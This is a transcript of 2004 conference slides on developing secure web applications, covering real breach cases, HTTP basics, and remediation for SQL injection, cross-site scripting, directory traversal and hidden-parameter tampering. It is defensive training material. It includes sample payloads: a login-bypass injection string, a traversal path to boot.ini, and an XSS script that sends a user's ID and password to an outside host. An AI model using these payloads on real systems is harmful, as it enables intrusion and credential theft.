Dennis Hurst SPI Dynamics Inc - StickyMinds · RIAA was hacked 8 times in 6 months The 6th time the...
Transcript of Dennis Hurst SPI Dynamics Inc - StickyMinds · RIAA was hacked 8 times in 6 months The 6th time the...
BIO PRESENTATION
Better Software Conference & EXPO September 27-30, 2004
San Jose, CA USA
T16
September 30, 2004 3:00 PM
DEVELOPING SECURE WEB
APPLICATIONS
Dennis Hurst SPI Dynamics Inc
Dennis HurstDennis Hurst, senior consulting engineer for SPI Dynamics, is responsible for working withdevelopers to educate them on the need for Web Application security and practical ways toprotect Web Applications from hacking attacks.
With more than 15 years experience in the Information Systems/Application developmentindustry, he is an expert in system design, implementation and maintenance of complex multi-vendor, multi-platform computer applications and networks. He has extensive experience inplanning developing and enhancing Internet systems as well as integrating Internet systemswith legacy systems. For the past three years he has focused on developing tools to test andsecure the HTTP protocol.
Dennis is a Microsoft Certified Solution Developer (MSCD in Visual Basic and SQL Server) anda Certified Novell Engineer (CNE) for version 3.x and 4.x. Furthermore, he has publishedarticles and developed classes on the secure application development process. Dennis hasspoken on the topic of secure coding practices at Software Development West 2004, WebSec2003 and various user group chapter meetings. He has been published in asp.net PRO and onhttp://www.15seconds.com/Issue/000612.htm.
Hacker Exploits, Coding Best Practices and Automated Code Testing Tools
Developing Secure Web Applications
Agenda
PART 1: Introductions
PART 2: What is Web Application Security?
PART 3: Web Application Hacks & Application Risks
PART 4: Web Applications and HTTP 101
PART 5: Web Application Attacks
PART 6: Managing & Detecting Vulnerabilities
SPI Dynamics
SPI Dynamics delivers security products and services that protect enterprises at the web application layer. These products are backed by the industry’s leading security experts, SPI Labs.
WebInspect is our industry leading web application security assessment product line and is licensed to enterprises, consultants, and other institutions, both directly and via global partners.
The Expert in Web Application Security Assessment
SPI Dynamics believes that security must be implemented across the application lifecycle. The earlier a security defect is detected the less it will ultimately cost an organization.
SPI Dynamics is dedicated to maintaining a leadership position in vulnerability assessment and we truly measure our success through the success of our customers.
SPI Dynamics
The Expert in Web Application Security Assessment
PART 2
What is Web Application Security?
The evolution from web sites to web applicationsWhere does the risk come from?
Web Applications
Browser
Web Servers
Presentation Layer
Media Store
Very complex architectures, multiple platforms, multiple protocols
Database Server
Customer Identification
Access Controls
Transaction Information
Core Business Data
Wireless
Web Services
Application Server
Business Logic
Content Services
Web Applications Invite Public Access
“Today over 70% of attacks against a company’s website or web application come at the ‘Application Layer’ not the Network or System layer.”
- Gartner
Web Applications Breach the Perimeter
HTTP(S)
INTER
NET
DM
ZTR
USTED
INSID
EC
OR
POR
ATE
INSID
E
FTP TELNET
Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server.
Any – Web Server: 80
Firewall only allows applications on the web server to talk to application server.
Web Server Application Server
Firewall only allows application
server to talk to database server.
Application Server Database
IMAP SSH POP3
IISSunOneApache
ASP.NET
WebSphereJava
SQLOracle
DB2
PART 3
Web Application Hacks and Application Risks
Who got hacked?How they got hacked, what method was used?What was the result of being hacked?Why web application risks occurWeb application vulnerabilities
Web Application Risk
“Web application incidents cost companies more than $320,000,000 in 2001.”
Forty-four percent (223 respondents) to the 2002 Computer Crime and Security Survey were willing and/or able to quantify their financial losses. These 223 respondents reported $455,848,000 in financial losses.
“2002 Computer Crime and Security Survey”
Computer Security Institute & San Francisco FBI Computer Intrusion Squad
Ziff DavisHacked August 2002Ziff Davis Media has agreed to revamp its website's security and pay affected customers $500 each after lax security exposed the personal data of thousands of subscribers last year.The agreement between Ziff Davis -- publisher of PC Magazine and other tech titles, including a slew of gaming magazines -- and attorneys general from New York, Vermont and California came after web surfers discovered an unprotected data file on Ziff Davis' site in November. The file contained names, addresses, e-mail addresses -- and, in some instances, credit card numbers -- of 12,000 people who signed up for a special promotion to receive Electronic Gaming Monthly magazine.
Recent Web Application Hack Example
Recent Web Application Hacks
Victoria’s Secret, November 27, 2002A vulnerability at the Victoria’s Secret web site allowed customers who purchased items there to view other customers’ orders.By simply changing the data in the URL address line the web application was manipulated.$50,000 fine and publicity in 2003
Victoria’s Secret
Recent Web Application Hacks
January 3, 2003RIAA was hacked 8 times in 6 months The 6th time the RIAA site was hacked, downloadable, pirated music was postedThis time, a URL allowing access to the RIAA's system for posting press releases was made publicly accessible, allowing people to post messages that then appeared on the RIAA's official press release page
Recording Industry Association of America
Sept 25th 2003: Car Shoppers Credit Details Exposed in Bulk
An administrative page not properly secured and any personal loan application information could be viewed.Over 1,000 shoppers from multiple websites had their entire financial history exposed on a public site
The researcher simply read the HTML comments, saw the filename, and typed it into his browser.
“The exposure of personal financial information could also put Dealerskins and its customers afoul of Federal Trade Commission (FTC) regulations “
Gateway Computers
Wall Street Journal Article “More Scary Tales Involving Big Holes in Website Security”, by Lee Gomes, February 2nd 2004
Gateway’s website stored an ID number in a cookie to identify you when returning to the site. By changing this ID number, you are able to view the information of other shoppers. Information viewable includes Name, Address, Phone Number, Order History, Last Four Digits of Credit Card, Credit Card Expiration Date, Credit Card Verification Code.
Federal Trade Commission investigates Guess Inc.
“Guess Settles with FTC over Cyber Security Snafu”, June 2003 by Kevin Poulson for SecurityFocus
“ Guess.com was open to an "SQL injection attack," permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database -- over 200,000 in all …The episode prompted a year-long FTC investigation into alleged deceptive trade practices by Guess “
"Consumers have every right to expect that a business that says it's keeping personal information secure is doing exactly that," said Howard Beales, Director of the FTC's consumer protection bureau, in a press release. "It's not just good business, it's the law."
Other Hacked Websites
Tiffany.Com - 2004 SQL Injection,OpenTable.com : Non-random identifiersSaks Fifth Avenue: Non-random identifiersFTD.com – February 14, 2003 sequential cookies
Source: CNET News “FTD Hole Leaks Personal Information “Travelocity - January 22, 2001 open directory
Source: CNET News “Travelocity Exposes Customer Information”
Creditcards.com – December 12, 2000 SQL InjectionSource: CNET News “Company says extortion try exposes thousands of card numbers “
CD Universe – January 9, 2000 SQL InjectionSource: Internetnews.com “Failed Blackmail Attempt Leads to Credit Card Theft”
MasterCard - February 17, 2003 Partner LiabilityTower Records - December 5, 2002 Access permissions
Security Professionals Don’t Know The Applications
The Web ApplicationSecurity Gap
Application Developers and QA Professionals Don’t Know Security
Why Web Application Risks Occur
Developers Are Not Security ProfessionalsApplication development stresses functionality, not securityLack of awareness of security issues in developmentLack of effective testing tools in Development & QAResource constrained development teams
Security Professionals Are Not DevelopersLack of awareness of application vulnerabilities in security teamsLack of effective testing tools Certification and accreditations don’t examine the web applicationDevelopment cycle missing from security procedures and auditsSecurity scrutinizes the desktop, the network, and the server. The web application is missing.
Why Web Application Risks Occur
Web Application Vulnerabilities
Platform
Administration
Application
Known Vulnerabilities
Extension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Parameter Manipulation
Cross-Site Scripting
SQL Injection
Buffer Overflow
Reverse Directory Transversal
JAVA Decompilation
Path Truncation
Hidden Web Paths
Cookie Manipulation
Application Mapping
Backup Checking
Directory Enumeration
Web application vulnerabilities occur in multiple areas.
PlatformKnown Vulnerabilities
Platform:• Known vulnerabilities can be
exploited immediately with a minimum amount of skill or experience – “script kiddies”
• Most easily defendable of all web vulnerabilities
• MUST have streamlined patching procedures
• MUST have inventory process
Web Application Vulnerabilities
AdministrationExtension Checking
Common File Checks
Data Extension Checking
Backup Checking
Directory Enumeration
Path Truncation
Hidden Web Paths
Forceful Browsing
Administration:• Less easily corrected than known issues• Require increased awareness• More than just configuration, must be
aware of security flaws in actual content
• Remnant files can reveal applications and versions in use
• Backup files can reveal source code and database connection strings
Web Application Vulnerabilities
Application Programming:
• User input is not examined from a security perspective.
• Unexpected code• Error messages……
Application
Web Application Vulnerabilities
Parameter Manipulation
Cross-Site Scripting
SQL Injection
Buffer Overflow
Reverse Directory Transversal
JAVA Decompilation
Path Truncation
Hidden Web Paths
Cookie Manipulation
Application Mapping
Backup Checking
Directory Enumeration
PART 4
Web Applications and HTTP 101
What are the components of a web application?How are these components secured?How does HTTP (the web) work?How does a hacker see your application?
The OSI Reference Model
Physical
Datalink
Network
Transport
Session
Presentation
Web based attacks (HTTP/HTTPS)
Network / OS / Service attacks
Layer 1 through 6 deal with how data is delivered.
Layer 7 deals with business logic (content and interpretation).
Application
Network
What is a Web-Based Application?
What is the data path (Network) for web applications?How does a web-based application work (HTTP)?How does your application work?
HTTP
Web Application
Client connects to the serverClient sends request to serverServer responds to clientConnection is disconnected
HTTP is stateless
Request
Response
Server
www.mybank.com
(64.58.76.230)
Port: 80Client PC
(10.1.0.123)
How Do Web Applications Communicate?
Network Layer
SSL (Secure Sockets Layer)Provided encryption of data between a client and server.Typically guarantees to client that server is who it asserts itself to be.
Securing the Network Layer
SSL Tunnel
Server
www.mybank.com
(64.58.76.230)
Port: 443Client PC
(10.1.0.123)
Securing the Network Layer
SSL Firewalls
Allows or disallows traffic to pass from the external network to the internal network.Acts as a “traffic cop”Port 80 (HTTP) and port 443 (HTTPS) travel freely through the firewall.
SSL Tunnel
Server
www.mybank.com
(64.58.76.230)
Port: 443Client PC
(10.1.0.123)
Securing the Network Layer
SSLFirewalls IDS (Intrusion Detection System)
Monitors network for malicious activitiesTypically signature based detection (similar to virus protection) Blind to encrypted (SSL) traffic.
IDS
SSL Tunnel
Server
www.mybank.com
(64.58.76.230)
Port: 443
Client PC
(10.1.0.123)
What is HTTP?
HTML Page<a href=http://www.test.me>Click Here</a>
Request
Response
GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.spidynamics.comConnection: Keep-Alive
HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Mon, 07 Apr 2003 12:52:26 GMTContent-Length: 10225Content-Type: text/htmlCache-control: private
Set-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;
<html><body>
Request
Response
ServerClient PC
HTML Page<a href=http://www.test.me>Click Here</a>Request
GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.spidynamics.comConnection: Keep-Alive
ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Mon, 07 Apr 2003 12:52:26 GMTContent-Length: 10225Content-Type: text/htmlCache-control: privateSet-Cookie: ASPSESSIONIDCSCRRCBS=GODPKFJDPJNMHGGJDOEIDDMK; path=/;
<html><body>
How Does Your Application Work?
GET – Simple query string based requestPOST – Contains POST data in the body of the request.
NetworkHTTP
Web Application
HTTP – GET With a Query String
HTML Page<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>
Request
Response
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&ID=5 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comConnection: Keep-AliveCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN
HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:17:50 GMTContent-Length: 4183Content-Type: text/htmlCache-control: privateSet-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/;
<HTML><HEAD><TITLE></TITLE></HEAD><BODY>
HTML Page<a href=http://www.test.me/banklogin.asp?serviceName=FreebankCaastAccess&ID=5 >Click Here</a>RequestGET /banklogin.asp?serviceName=FreebankCaastAccess& templateName=prod_sel.forte&ID=5 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comConnection: Keep-AliveCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN
ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:17:50 GMTContent-Length: 4183Content-Type: text/htmlCache-control: privateSet-Cookie: sessionid=25; path=/; Set-Cookie: state=GA; path=/; Set-Cookie: username=MrUser; path=/; Set-Cookie: userid=1538; path=/;
<HTML><HEAD><TITLE></TITLE></HEAD><BODY>
HTTP – POST With POST Data
Form
Request
Response
<FORM ACTION="login1.asp" METHOD=“POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>
POST /login1.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccessAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comContent-Length: 23Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;……
login=John&password=Doe
HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:35:00 GMTContent-Length: 80Content-Type: text/htmlCache-control: private
<html><body>Welcome John. …………..</body></html>
Form<FORM ACTION="login1.asp" METHOD=“POST"><br>Username:<INPUT TYPE="text" NAME="login"><BR>Password:<INPUT TYPE="password" NAME="password" ><BR><INPUT TYPE="submit"><BR></FORM>
RequestPOST /login1.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,*/*Referer: http://www.company.com/banklogin.asp?serviceName=FreebankCaastAccessAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)Host: www.company.comContent-Length: 23Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDCQABRCAA=DKBNDFFCLDKNPGFDDFJCLBDN; sessionid=25; state=GA;……
login=John&password=Doe
ResponseHTTP/1.1 200 OKServer: Microsoft-IIS/5.0Date: Fri, 04 Apr 2003 15:35:00 GMTContent-Length: 80Content-Type: text/htmlCache-control: private
<html><body>Welcome John. …………..</body></html>
PART 5
Web Application Attacks
QuestionDefine – What is it and what is at stake?Result – How does it happen?Fix – How to fix web application vulnerabilities?
Types of AttacksSQL InjectionCross Site Scripting (XSS)Directory TraversalHidden parameters
SQL Injection – Defined
SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first.
SQL Injection – Simple Example
‘/‘/ Login SQL Statemet‘/SQLtemp = "SELECT * FROM Users " & _
"WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'"
Set rs = Apples.Execute(SQLtemp)If not rs.eof then
‘/ Successful login!!…..
‘/‘/ Login SQL Statemet‘/SQLtemp = "SELECT * FROM Users " & _ "WHERE userID = '" & Request.form("username") & "' " & _ "and pass = '" & Request.Form("password") & "'"
Set rs = Apples.Execute(SQLtemp)If not rs.eof then‘/ Successful login!!…..
SQL Injection – Simple Example
What the hacker knowsThe web page is creating a SQL statement that takes two parameters.The parameters are both strings.The parameters are, most likely, being passed to the database unfiltered.
The hacker can now guess that the SQL statement looks something like this:
The hack can now start making educated guesses:
Select <something> from <sometable> where <fieldone> = ‘<user input one>’And <fieldtwo> = ‘<user input two>’
Select <something> from <sometable> where <fieldone> = ‘' or 1=1 or 'a' ='’And <fieldtwo> = ‘' or 1=1 or 'a' ='’
SQL Injection – Solution
Use parameterized queries
Trap your Errors!!! Don’t let the environmentUse Stored ProceduresValidate User InputTurn off default error messages
cnn = new SqlConnection(…database connection information here…);
cmd = new SqlCommand("SELECT FirstName, LastName from Users “
+ "WHERE UserName = @uid AND password = @passwd",cnn);
cmd.Parameters.Add("@uid", SqlDbType.VarChar, 100).Value=uid;
cmd.Parameters.Add("@passwd", SqlDbType.VarChar,100).Value = passwd;
cnn.Open();
Cross Site Scripting (XSS)
Cross-site scripting (also know as XSS or CSS) occurs when dynamically generated web pages display input that is not property validated.A user passes input in the form of a parameter to the web server.The web server returns the user provided input back to the user without proper encoding.
http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20<script>alert(document.cookie)</script>
Cross Site Scripting (XSS)
<input type=text name=txtUserID ….
<input type=text name=txtPassword…
HTML
var oImg = new Image;
oImg.src = "http://www.test.me/"
+ document.frmTest.txtUserID.value + "."
+ document.frmTest.txtPassword.value;
XSS JavaScript
Web Log
…. 127.0.0.1 GET /test/xss.asp 200
…. 127.0.0.1 GET /MyUserID.MyPassword 404
…. 127.0.0.1 GET /test/xss.asp 200
Cross Site Scripting (XSS) - Solution
HTML Encode all data before it is RETURNED to a users web browser.
Data that comes from a userData that comes from a databaseData that comes from any dynamic source
Server.HTMLEncode provides this functionalityValidate user input
Directory Traversal – Result
This is a standard site that shows a list of available documents in the FAQ folder.
Directory Traversal – Result
Clicking on one of the links shows the selected document.Notice the parameter ?Template=Check+Card%2Etxt. When you URL Decode that parameter it will look like:
?Template=Check Card.txtThis could be a file name.
Directory Traversal – Result
Changing the Template parameter to ../../../../../boot.ini opened the boot.ini file.A hacker now has full access to any file on the hard drive.
Directory Traversal – The Code
The vulnerable code
Secure version of the code
sFile = Request("Template“) ‘/Get the parameterif sFile <> "" then
‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false)
sFile = Request("Template“) ‘/Get the parameter
'/Quick security check if Regex.Match(sFile, “[^a-zA-Z0-9.]”) <> “” then ‘/Look for invalid characters
sFile = "“ ‘/Looks odd, don’t accept it end if
if sFile <> "" then‘/User passed a parameter if fso.FileExists(sDir & "\" & sFile) then set oStream = fso.OpenTextFile(sDir & "\" & sFile,1, false)
Directory Traversal - Fix
Avoid using a parameter as a file name.When using a parameter as a file name use EXTREME caution to ensure that the name passed in is a valid file name and is not trying to reference a file in a parent folder.Limit the web server to only access appropriate folders on the web server and not parent folders outside the web site file structure.….and….. Validate user input
Hidden Parameters
Hidden parameters allow developers to pass variables to and from a web browser in the same way other <input> tags do, however they are not seen by the end user.The format is <input type=hidden name=myname value=myvalue>The primary danger in using hidden parameters is that they can be modified by a hacker and are seldom tested during the development and QA process.
Hidden Parameters – The Hack
Request before the hack
Request after the hack
POST /BankSite/xferconfirm.asp HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http://www.nubank.me/BankSite/acctxfer.aspAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)Host: www.nubank.meContent-Length: 103Connection: CloseCache-Control: no-cacheCookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM
fromAcct=120199789890&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfer
POST /BankSite/xferconfirm.asp HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http://www.nubank.me/BankSite/acctxfer.aspAccept-Language: en-usContent-Type: application/x-www-form-urlencodedAccept-Encoding: identityUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; (R1 1.3); .NET CLR 1.0.3705)Host: www.nubank.meContent-Length: 103Connection: CloseCache-Control: no-cacheCookie: ASPSESSIONIDQCDCDBRB=AJPFJELCAAEFJOPKCAJFIFBM
fromAcct=44797501008896675&toAcct=18822281934&amount=2000.00&memo=From+HE+to+IC&Enter=Preview+Transfe
Hidden Parameters – The Fix
Never assume a hidden parameter has not been tampered with by the end user.Never put secure information in a hidden parameter.Ensure that proper QA testing of all hidden parameters is done prior to going live with any application.Add proper hidden parameter use guidelines to development methodology documents and processes.….and again….validate user input
The fix – Trust buy verify
Validate ALL user inputValidate every time you use user inputEverything in a request is “user input”
PART 6
Managing and Detecting Web Application Vulnerabilities
Building a secure development processWeb application ROIDetecting web application vulnerabilitiesManaging and addressing web application security risk throughout the enterprise
Application Lifecycle Phases
Design Development
TestingProduction
Security Operations and Auditors
Developers
QA and Developers
Auditors, Dev, and Business Subject Matter Experts (SME)
Application Lifecycle Phases
Design Development
TestingProduction
Security Operations and Auditors
Developers
QA and Developers
Auditors, Dev, and Business Subject Matter Experts (SME)
Application Lifecycle Phases
Design Development
TestingProduction
Security Operations and Auditors
Developers
QA and Developers
Auditors, Dev, and Business Subject Matter Experts (SME)
Managing Web Application Security Risk
Educate the development team.
Develop and publish best practices.
Develop secure code
Test and verify that code is developed securely
Perform routine audits of production systems.
Establish remediation procedures.
Keep track of security trends.
Bring security to the development team…
Detecting Web Application Vulnerabilities
Time consuming
Expensive
Not repeatable
Time consuming
Rely on third party individuals (penetration testers)
High performance, automated web application assessment
Cost effective
Scalable throughout entire application lifecycle
Consistent high quality assessments
Provides economy of scale (SPI Labs)
Customizable (Custom Agents)
Manual vs. Automatic Testing